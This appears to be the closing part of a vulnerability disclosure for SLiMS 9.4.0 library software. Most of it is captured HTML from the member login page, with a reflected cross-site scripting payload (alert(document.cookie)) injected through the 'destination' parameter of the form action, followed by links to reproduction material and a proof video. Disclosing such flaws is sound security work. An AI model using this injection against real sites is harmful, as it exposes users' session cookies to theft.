2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Tag

#chrome